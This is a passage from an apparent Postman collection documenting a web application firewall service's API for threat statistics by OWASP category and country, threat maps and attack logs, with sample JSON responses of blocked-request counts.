            },\n                    {\n                        \"id\": 61,\n                        \"time\": 1587457440000,\n                        \"line_number\": 0\n                    }\n                ]\n            },\n            {\n                \"line_name\": \"Off\",\n                \"numbers\": [\n                    {\n                        \"id\": 1,\n                        \"time\": 1587453840000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 2,\n                        \"time\": 1587453900000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 3,\n                        \"time\": 1587453960000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 4,\n                        \"time\": 1587454020000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 5,\n                        \"time\": 1587454080000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 6,\n                        \"time\": 1587454140000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 7,\n                        \"time\": 1587454200000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 8,\n                        \"time\": 1587454260000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 9,\n                        \"time\": 1587454320000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 10,\n                        \"time\": 1587454380000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 11,\n                        \"time\": 1587454440000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 12,\n                        \"time\": 1587454500000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 13,\n                        \"time\": 1587454560000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 14,\n                        \"time\": 1587454620000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 15,\n                        \"time\": 1587454680000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 16,\n                        \"time\": 1587454740000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 17,\n                        \"time\": 1587454800000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 18,\n                        \"time\": 1587454860000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 19,\n                        \"time\": 1587454920000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 20,\n                        \"time\": 1587454980000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 21,\n                        \"time\": 1587455040000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 22,\n                        \"time\": 1587455100000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 23,\n                        \"time\": 1587455160000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 24,\n                        \"time\": 1587455220000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 25,\n                        \"time\": 1587455280000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 26,\n                        \"time\": 1587455340000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 27,\n                        \"time\": 1587455400000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 28,\n                        \"time\": 1587455460000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 29,\n                        \"time\": 1587455520000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 30,\n                        \"time\": 1587455580000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 31,\n                        \"time\": 1587455640000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 32,\n                        \"time\": 1587455700000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 33,\n                        \"time\": 1587455760000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 34,\n                        \"time\": 1587455820000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 35,\n                        \"time\": 1587455880000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 36,\n                        \"time\": 1587455940000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 37,\n                        \"time\": 1587456000000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 38,\n                        \"time\": 1587456060000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 39,\n                        \"time\": 1587456120000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 40,\n                        \"time\": 1587456180000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 41,\n                        \"time\": 1587456240000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 42,\n                        \"time\": 1587456300000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 43,\n                        \"time\": 1587456360000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 44,\n                        \"time\": 1587456420000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 45,\n                        \"time\": 1587456480000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 46,\n                        \"time\": 1587456540000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 47,\n                        \"time\": 1587456600000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 48,\n                        \"time\": 1587456660000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 49,\n                        \"time\": 1587456720000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 50,\n                        \"time\": 1587456780000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 51,\n                        \"time\": 1587456840000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 52,\n                        \"time\": 1587456900000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 53,\n                        \"time\": 1587456960000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 54,\n                        \"time\": 1587457020000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 55,\n                        \"time\": 1587457080000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 56,\n                        \"time\": 1587457140000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 57,\n                        \"time\": 1587457200000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 58,\n                        \"time\": 1587457260000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 59,\n                        \"time\": 1587457320000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 60,\n                        \"time\": 1587457380000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 61,\n                        \"time\": 1587457440000,\n                        \"line_number\": 0\n                    }\n                ]\n            }\n        ],\n        \"sum_info\": {\n            \"Monitor\": 0,\n            \"Block\": 61,\n            \"HTTP\": 0,\n            \"HTTPS\": 61,\n            \"total_number\": 61,\n            \"total_score\": 1830,\n            \"threat_level\": \"High\"\n        }\n    }\n}"},{"id":"a9fd1b9f-3b45-4fd9-bcfc-2a9baecd3042","name":"timviewOfThreatsByOWASPTOP10","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/threatview/security/statistics?report_by=owasp_top10&filter={}&end=1583985109257&start=1583812309257&count=100&tend_by=action&sort_by=total_number","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","threatview","security","statistics"],"query":[{"key":"report_by","value":"owasp_top10","description":"Log field name that is used to group the result in grid. Supported values include owasp_top10, main_type, src_ip and srccountry."},{"key":"filter","value":"{}","description":"A string, it can be deserialized as Json object. \nThe value shall be URL safe. For example, filter object is like  {\"http_url\":\"test\",\"main_type\":\"Known Attacks\"}, and the value for this param here shall be like \"%7B%22http_url%22%3A%22test%22%2C%22main_type%22%3A%22Known%20Attacks%22%7D\"."},{"key":"end","value":"1583985109257","description":"The endtime of time range in millisecond format."},{"key":"start","value":"1583812309257","description":"The beginning time of time range in millisecond format."},{"key":"count","value":"100","description":"An integer, the number of logs in one page and the maximum value is 100."},{"key":"tend_by","value":"action","description":"Log field name which is used to group data in chart view. The values can be http_method, action, etc."},{"key":"sort_by","value":"total_number","description":"The field name which is used to sort the result. It must be  present in response, like total_number, score, etc"}],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The application ID, it can be obtained from List Applications API."}]}},"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"details\": [\n        {\n            \"owasp_top10\": \"A1:2017-Injection\",\n            \"total_number\": 49,\n            \"total_score\": 1950,\n            \"HTTPS\": 49,\n            \"Block\": 49,\n            \"HTTP\": 0,\n            \"Monitor\": 0\n        },\n        {\n            \"owasp_top10\": \"A9:2017-Using Components with Known Vulnerabilities\",\n            \"total_number\": 48,\n            \"total_score\": 2400,\n            \"HTTPS\": 48,\n            \"Block\": 48,\n            \"HTTP\": 0,\n            \"Monitor\": 0\n        },\n        {\n            \"owasp_top10\": \"A7:2017-Cross-Site Scripting (XSS)\",\n            \"total_number\": 26,\n            \"total_score\": 980,\n            \"HTTPS\": 26,\n            \"Block\": 26,\n            \"HTTP\": 0,\n            \"Monitor\": 0\n        }\n    ],\n    \"summary\": {\n        \"start\": \"1583812309257\",\n        \"end\": \"1583985109257\",\n        \"count\": 2,\n        \"graph\": [\n            {\n                \"line_name\": \"Block\",\n                \"numbers\": [\n                    {\n                        \"id\": 1,\n                        \"time\": 1583811600000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 2,\n                        \"time\": 1583812800000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 3,\n                        \"time\": 1583814000000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 4,\n                        \"time\": 1583815200000,\n                        \"line_number\": 2\n                    },\n                    {\n                        \"id\": 5,\n                        \"time\": 1583816400000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 145,\n                        \"time\": 1583984400000,\n                        \"line_number\": 1\n                    }\n                ]\n            },\n            {\n                \"line_name\": \"Monitor\",\n                \"numbers\": [\n                    {\n                        \"id\": 1,\n                        \"time\": 1583811600000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 2,\n                        \"time\": 1583812800000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 3,\n                        \"time\": 1583814000000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 4,\n                        \"time\": 1583815200000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 5,\n                        \"time\": 1583816400000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 145,\n                        \"time\": 1583984400000,\n                        \"line_number\": 0\n                    }\n                ]\n            }\n        ],\n        \"sum_info\": {\n            \"Monitor\": 0,\n            \"Block\": 123,\n            \"HTTP\": 0,\n            \"HTTPS\": 123,\n            \"total_number\": 123,\n            \"total_score\": 5330,\n            \"threat_level\": \"Off\"\n        }\n    }\n}"},{"id":"d7783c44-0288-4ff6-80eb-2d6d25ed9742","name":"threatviewThreatsByCountries","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/threatview/security/statistics?report_by=srccountry&filter={}&end=1587457479971&start=1587453879971&count=100&tend_by=action&sort_by=total_number","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","threatview","security","statistics"],"query":[{"key":"report_by","value":"srccountry","description":"String. Log field name which will be used to group the result in grid. Value could be srccountry, \nmain_type, sub_type, etc."},{"key":"filter","value":"{}","description":"String. Could be deserialized as Json object. Make sure the value is url safe. For example, filter object is like  {\"http_url\":\"test\",\"main_type\":\"Known Attacks\"}. Then value for this param here should be like \"%7B%22http_url%22%3A%22test%22%2C%22main_type%22%3A%22Known%20Attacks%22%7D\""},{"key":"end","value":"1587457479971","description":"Long. The endtime of time range in millisecond format"},{"key":"start","value":"1587453879971","description":"Long. The beginning time of time range in millisecond format"},{"key":"count","value":"100","description":"Integer. Number of logs in one page. Value should be less than 100."},{"key":"tend_by","value":"action","description":"String. Log field name which will be used to group data in chart view. Value could be http_method, action, etc."},{"key":"sort_by","value":"total_number","description":"String. Field name which will be used to sort the result. Must present in response, like total_number, score, etc"}],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"String, the application ID."}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Wed, 05 Jun 2019 10:07:03 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"6748"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"aa49da52-8779-11e9-92d5-f5c9aa6d0dd7"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"azQbFG9ZoAMFTcQ="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cf79446-529203b4c02ef84212c83d9c;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"details\": [\n        {\n            \"srccountry\": \"United States\",\n            \"total_number\": 60,\n            \"total_score\": 1800,\n            \"HTTPS\": 60,\n            \"Block\": 60,\n            \"HTTP\": 0,\n            \"Monitor\": 0\n        },\n        {\n            \"srccountry\": \"Germany\",\n            \"total_number\": 1,\n            \"total_score\": 30,\n            \"HTTPS\": 1,\n            \"Block\": 1,\n            \"HTTP\": 0,\n            \"Monitor\": 0\n        }\n    ],\n    \"summary\": {\n        \"start\": \"1587453879971\",\n        \"end\": \"1587457479971\",\n        \"count\": 2,\n        \"graph\": [\n            {\n                \"line_name\": \"Block\",\n                \"numbers\": [\n                    {\n                        \"id\": 1,\n                        \"time\": 1587453840000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 2,\n                        \"time\": 1587453900000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 3,\n                        \"time\": 1587453960000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 4,\n                        \"time\": 1587454020000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 5,\n                        \"time\": 1587454080000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 6,\n                        \"time\": 1587454140000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 7,\n                        \"time\": 1587454200000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 8,\n                        \"time\": 1587454260000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 9,\n                        \"time\": 1587454320000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 10,\n                        \"time\": 1587454380000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 11,\n                        \"time\": 1587454440000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 12,\n                        \"time\": 1587454500000,\n                        \"line_number\": 2\n                    },\n                    {\n                        \"id\": 13,\n                        \"time\": 1587454560000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 14,\n                        \"time\": 1587454620000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 15,\n                        \"time\": 1587454680000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 16,\n                        \"time\": 1587454740000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 17,\n                        \"time\": 1587454800000,\n                        \"line_number\": 2\n                    },\n                    {\n                        \"id\": 18,\n                        \"time\": 1587454860000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 19,\n                        \"time\": 1587454920000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 20,\n                        \"time\": 1587454980000,\n                        \"line_number\": 2\n                    },\n                    {\n                        \"id\": 21,\n                        \"time\": 1587455040000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 22,\n                        \"time\": 1587455100000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 23,\n                        \"time\": 1587455160000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 24,\n                        \"time\": 1587455220000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 25,\n                        \"time\": 1587455280000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 26,\n                        \"time\": 1587455340000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 27,\n                        \"time\": 1587455400000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 28,\n                        \"time\": 1587455460000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 29,\n                        \"time\": 1587455520000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 30,\n                        \"time\": 1587455580000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 31,\n                        \"time\": 1587455640000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 32,\n                        \"time\": 1587455700000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 33,\n                        \"time\": 1587455760000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 34,\n                        \"time\": 1587455820000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 35,\n                        \"time\": 1587455880000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 36,\n                        \"time\": 1587455940000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 37,\n                        \"time\": 1587456000000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 38,\n                        \"time\": 1587456060000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 39,\n                        \"time\": 1587456120000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 40,\n                        \"time\": 1587456180000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 41,\n                        \"time\": 1587456240000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 42,\n                        \"time\": 1587456300000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 43,\n                        \"time\": 1587456360000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 44,\n                        \"time\": 1587456420000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 45,\n                        \"time\": 1587456480000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 46,\n                        \"time\": 1587456540000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 47,\n                        \"time\": 1587456600000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 48,\n                        \"time\": 1587456660000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 49,\n                        \"time\": 1587456720000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 50,\n                        \"time\": 1587456780000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 51,\n                        \"time\": 1587456840000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 52,\n                        \"time\": 1587456900000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 53,\n                        \"time\": 1587456960000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 54,\n                        \"time\": 1587457020000,\n                        \"line_number\": 2\n                    },\n                    {\n                        \"id\": 55,\n                        \"time\": 1587457080000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 56,\n                        \"time\": 1587457140000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 57,\n                        \"time\": 1587457200000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 58,\n                        \"time\": 1587457260000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 59,\n                        \"time\": 1587457320000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 60,\n                        \"time\": 1587457380000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 61,\n                        \"time\": 1587457440000,\n                        \"line_number\": 1\n                    }\n                ]\n            },\n            {\n                \"line_name\": \"Monitor\",\n                \"numbers\": [\n                    {\n                        \"id\": 1,\n                        \"time\": 1587453840000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 2,\n                        \"time\": 1587453900000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 3,\n                        \"time\": 1587453960000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 4,\n                        \"time\": 1587454020000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 5,\n                        \"time\": 1587454080000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 6,\n                        \"time\": 1587454140000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 7,\n                        \"time\": 1587454200000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 8,\n                        \"time\": 1587454260000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 9,\n                        \"time\": 1587454320000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 10,\n                        \"time\": 1587454380000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 11,\n                        \"time\": 1587454440000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 12,\n                        \"time\": 1587454500000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 13,\n                        \"time\": 1587454560000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 14,\n                        \"time\": 1587454620000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 15,\n                        \"time\": 1587454680000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 16,\n                        \"time\": 1587454740000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 17,\n                        \"time\": 1587454800000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 18,\n                        \"time\": 1587454860000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 19,\n                        \"time\": 1587454920000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 20,\n                        \"time\": 1587454980000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 21,\n                        \"time\": 1587455040000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 22,\n                        \"time\": 1587455100000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 23,\n                        \"time\": 1587455160000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 24,\n                        \"time\": 1587455220000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 25,\n                        \"time\": 1587455280000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 26,\n                        \"time\": 1587455340000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 27,\n                        \"time\": 1587455400000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 28,\n                        \"time\": 1587455460000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 29,\n                        \"time\": 1587455520000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 30,\n                        \"time\": 1587455580000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 31,\n                        \"time\": 1587455640000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 32,\n                        \"time\": 1587455700000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 33,\n                        \"time\": 1587455760000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 34,\n                        \"time\": 1587455820000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 35,\n                        \"time\": 1587455880000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 36,\n                        \"time\": 1587455940000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 37,\n                        \"time\": 1587456000000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 38,\n                        \"time\": 1587456060000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 39,\n                        \"time\": 1587456120000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 40,\n                        \"time\": 1587456180000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 41,\n                        \"time\": 1587456240000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 42,\n                        \"time\": 1587456300000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 43,\n                        \"time\": 1587456360000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 44,\n                        \"time\": 1587456420000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 45,\n                        \"time\": 1587456480000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 46,\n                        \"time\": 1587456540000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 47,\n                        \"time\": 1587456600000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 48,\n                        \"time\": 1587456660000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 49,\n                        \"time\": 1587456720000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 50,\n                        \"time\": 1587456780000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 51,\n                        \"time\": 1587456840000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 52,\n                        \"time\": 1587456900000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 53,\n                        \"time\": 1587456960000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 54,\n                        \"time\": 1587457020000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 55,\n                        \"time\": 1587457080000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 56,\n                        \"time\": 1587457140000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 57,\n                        \"time\": 1587457200000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 58,\n                        \"time\": 1587457260000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 59,\n                        \"time\": 1587457320000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 60,\n                        \"time\": 1587457380000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 61,\n                        \"time\": 1587457440000,\n                        \"line_number\": 0\n                    }\n                ]\n            }\n        ],\n        \"sum_info\": {\n            \"Monitor\": 0,\n            \"Block\": 61,\n            \"HTTP\": 0,\n            \"HTTPS\": 61,\n            \"total_number\": 61,\n            \"total_score\": 1830,\n            \"threat_level\": \"Off\"\n        }\n    }\n}"}],"_postman_id":"e5dfe677-0a1c-41c3-b189-65da4cf5183d"},{"name":"Get Threat Map","id":"2a0ad538-f111-45fd-9604-0139f66001f0","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":"https://api.tim.waasonline.com/v1/application/:ep_id/threatview/security/threatmap?count={{count}}&end={{end_time}}&start={{start_time}}","description":"<p>Get the information of threats by geographic region.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","threatview","security","threatmap"],"host":["api","tim","waasonline","com"],"query":[{"description":{"content":"<p>An integer, log numbers that will be retrieved in one request. The maximum value is 2000.</p>\n","type":"text/plain"},"key":"count","value":"{{count}}"},{"description":{"content":"<p>The end time in millisecond format. </p>\n","type":"text/plain"},"key":"end","value":"{{end_time}}"},{"description":{"content":"<p>The start time in millisecond format.</p>\n","type":"text/plain"},"key":"start","value":"{{start_time}}"}],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"d8855aa2-1f2b-4d3d-82b8-da3ebfcb7a0e","name":"ThreatMap","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/threatview/security/threatmap?count=200&end=1557729179000&start=1557725179000","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","threatview","security","threatmap"],"query":[{"key":"count","value":"200"},{"key":"end","value":"1557729179000"},{"key":"start","value":"1557725179000"}],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Wed, 05 Jun 2019 10:02:51 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"127"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"1378b0d5-8779-11e9-9c8b-d5a461c57816"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"azPziGEyIAMFv6w="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cf79349-c5278cbd2a57a5ec2565bf79;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"details\": [],\n    \"total\": 0,\n    \"next_msg_id\": false,\n    \"next_start_time\": false,\n    \"end_time\": \"1557729179000\",\n    \"region\": \"us-east-1\"\n}"}],"_postman_id":"2a0ad538-f111-45fd-9604-0139f66001f0"},{"name":"Get Attack Logs List","id":"82df24e9-5c38-4696-8949-a108e7508b07","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":"https://api.tim.waasonline.com/v1/application/:ep_id/attack_logs?size={{size}}&page={{page}}&filter={{filter}}","description":"<p>Get the information of attack log list.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","attack_logs"],"host":["api","tim","waasonline","com"],"query":[{"description":{"content":"<p>An integer, log numbers in one page. The maximum value is 100.</p>\n","type":"text/plain"},"key":"size","value":"{{size}}"},{"description":{"content":"<p>An integer, the page number. The 